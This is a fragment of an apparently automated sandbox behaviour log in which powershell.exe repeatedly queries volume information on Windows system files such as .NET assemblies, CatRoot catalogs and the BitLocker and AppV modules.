                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
